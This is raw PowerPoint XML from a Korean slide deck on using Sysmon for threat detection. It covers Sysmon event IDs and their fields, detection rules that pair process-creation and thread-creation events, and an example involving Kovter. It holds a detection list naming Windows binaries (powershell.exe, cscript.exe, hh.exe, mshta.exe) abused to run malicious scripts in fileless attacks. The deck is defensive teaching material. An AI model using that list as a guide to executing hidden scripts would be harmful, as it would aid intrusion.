            <a:ext cx="4018836" cy="2405869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1A30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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Event ID 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>과</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="0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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Event ID 8  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기준으로</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="0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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>탐지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>작성 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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B348B46-CD09-475A-9142-1CD4CAFB3299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12477124" y="5261907"/>
            <a:ext cx="3650315" cy="2405869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1A30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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>추가로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Event ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 탐지 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="0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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>작성하여 행위 의심</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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53FBFBAA-B71D-4739-80D4-6236DFFD7442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5752406" y="6100108"/>
            <a:ext cx="456289" cy="515543"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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E08CA248-4A4B-4CF2-B037-92D91A73742A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11423067" y="6100108"/>
            <a:ext cx="456289" cy="515543"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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716315-8F19-4C66-A981-D71E172A798A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1504323" y="3086100"/>
            <a:ext cx="13030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/>
              <a:t>Sysmon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>활용 전략</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1644857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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Event Analysis : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B060000010101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BF2625C-AF71-42D3-B681-954D272F41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113557"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="799587" y="3317240"/>
          <a:ext cx="9436768" cy="6395720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1435768">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="925674631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047615291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536063032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EventID</a:t>
                      </a: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역할</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="62738" marR="627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주요 사용 필드</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="62738" marR="627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678852"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1987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2400" kern="0" spc="-2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프로세스 생성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400" kern="0" spc="-2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OriginalFileName</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="0" spc="-2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1657759"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1987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2400" kern="0" spc="-2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네트워크 연결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400" kern="0" spc="-2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Destination Port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9399"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1987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2400" kern="0" spc="-2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스레드 생성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400" kern="0" spc="-2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TargetProcessId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8006819"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1987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2400" kern="0" spc="-2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파일 생성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400" kern="0" spc="-2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TargetFileName</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="0" spc="-2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7623719"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1987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2400" kern="0" spc="-2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레지스트리 키 생성 및 삭제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400" kern="0" spc="-2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TargetObject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5538740"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1987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2400" kern="0" spc="-2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레지스트리 키 수정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400" kern="0" spc="-2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Details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3869904"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="16306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2400" kern="0" spc="-2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레지스트리 키 및 값 이름 변경 이벤트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400" kern="0" spc="-2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TargetObject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5032086"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1987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19 &amp; 20 &amp; 21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400" kern="0" spc="-2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WMI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400" kern="0" spc="-2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Operation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21040"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1987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400" kern="0" spc="-2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DNS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2400" kern="0" spc="-2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쿼리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400" kern="0" spc="-2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QueryName</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="0" spc="-2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2679942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AA331E7E-9734-4657-B482-FE0C92987811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704227" y="2334280"/>
            <a:ext cx="1127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Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>Sysmon Event Id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>를 기준으로 필드 내의 데이터를 검사하여 탐지를 진행</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000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5BADE146-0C1E-4A02-8387-AC9EE891F927}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12496800" y="5448300"/>
            <a:ext cx="762000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실내, 조류, 꽃이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC0E8FF-3CFD-4A24-9085-211CD2C76D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4092680"/>
            <a:ext cx="7089950" cy="47030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554B06-EE54-4B43-B5D2-F930546397A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12877800" y="8783733"/>
            <a:ext cx="30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Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>Sysmon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>EventID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t> 1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25537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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Event Analysis : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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7015B9-F3D4-4A13-ABB9-4697452F6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2387" y="3695700"/>
            <a:ext cx="5184423" cy="50712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C17675-6AEE-44B3-B0E6-5B55A3DA4A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13780598" y="8766926"/>
            <a:ext cx="30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Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>Sysmon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>Rule.json</a:t>
            </a:r>
            <a:endParaRPr lang="ko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37C75D-6CA0-4617-8E96-280AC974F8EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207774" y="2017258"/>
            <a:ext cx="12240388" cy="828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70000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>“ Rule : Event id = 1 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" kern="0" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>프로세스 생성 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" kern="0" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>+ “Rule : Event id = 8 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" kern="0" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>스레드 생성 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400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1590096-AF68-4B04-9222-C12B1FC611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023547"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="391190" y="3307595"/>
          <a:ext cx="12190134" cy="5748023"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2360334">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="638340151"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="9829800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3674509799"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="65739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2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EventData</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2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2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OriginalFilename</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2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3026" marR="43026" marT="31355" marB="3135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2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43026" marR="43026" marT="31355" marB="313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07271"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="10645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powershell.exe</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="44419" marR="44419" marT="12281" marB="122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22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Fileless</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2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공격에서 가장 많이 악용되는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2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Script interpreter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2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command line interpreter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2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역할도 하는 강력한 바이너리</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="44419" marR="44419" marT="12281" marB="122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4759404"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8172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cscript.exe</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="44419" marR="44419" marT="12281" marB="122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2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Visual Basic script interpreter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2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Windows Server</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2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에서 동작</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2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VBScript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2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 악성행위 수행</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="44419" marR="44419" marT="12281" marB="122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557685"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4874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hh.exe</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="44419" marR="44419" marT="12281" marB="122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2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chm </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2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파일을 실행시키는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2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chm </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2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파일을 실행시키면 내부의 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2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2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script </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2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동작으로 악성행위 수행</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="44419" marR="44419" marT="12281" marB="122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048576"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="124104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mshta.exe</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="44419" marR="44419" marT="12281" marB="122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22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javascript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2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22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vbscript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2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실행을 중계 가능</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="44419" marR="44419" marT="12281" marB="122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63953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4723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숨은그림찾기 추억편(월리를 찾아라!) - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20718E0E-178F-4028-AE59-D930DCC54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31" y="-24872"/>
            <a:ext cx="18329931" cy="1031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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Event Analysis : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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772C818-3AC2-443B-A5F7-1A0EE1705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5637" y="-4456008"/>
            <a:ext cx="10262933" cy="265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D90F166-FFA1-467B-B4B0-3EAF593E16F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3961711" y="3955290"/>
            <a:ext cx="7810500" cy="1188210"/>
            <a:chOff x="4419600" y="3755620"/>
            <a:chExt cx="7810500" cy="118821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FF65C9-C739-4596-BF18-5DFEAE309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9600" y="3848100"/>
              <a:ext cx="943553" cy="94355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9F96F9-106D-4547-AB7F-0EDAAA8318E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5908667" y="3755620"/>
              <a:ext cx="2115336" cy="11285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base" latinLnBrk="0" hangingPunct="1"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200" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>EventID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t> : 1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>PID : 554</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="24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223B08-0CC8-44BE-872E-0C7206F80ED6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7620000" y="3755620"/>
              <a:ext cx="4610100" cy="11882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200" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>Psname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t> : </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>mshta.exe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7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endParaRPr lang="ko-KR" altLang="en-US" sz="2400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52FBAE9-2A8C-4B9C-9F06-952A378B9632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17297400" y="635221"/>
            <a:ext cx="4610100" cy="1128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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>사용자가</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="에스코어 드림 4 Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t> 판단</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="에스코어 드림 4 Regular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4047C4F-4612-4641-92F0-A02A89F5BD62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1656659" y="2530300"/>
            <a:ext cx="4610100" cy="584775"/>
            <a:chOff x="-823177" y="2347924"/>
            <a:chExt cx="4610100" cy="5847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DE402D92-469E-45C3-819A-90F04446B7E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="738666" y="2347924"/>
              <a:ext cx="1486413" cy="576160"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 42173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E564578-6E6C-4107-A891-D9DD8CBDD99D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-823177" y="2347924"/>
              <a:ext cx="46101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200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>Kovter</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular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6F91EFD-DA47-4A73-8A81-168777625835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6543709" y="5276414"/>
            <a:ext cx="7332873" cy="1749837"/>
            <a:chOff x="7569582" y="5659012"/>
            <a:chExt cx="7332873" cy="1749837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A76BA10A-D2E2-4870-A14D-48E5A0647D4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7672985" y="5659012"/>
              <a:ext cx="0" cy="4977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50E0966-647D-42BB-B8BA-549657D8BC49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
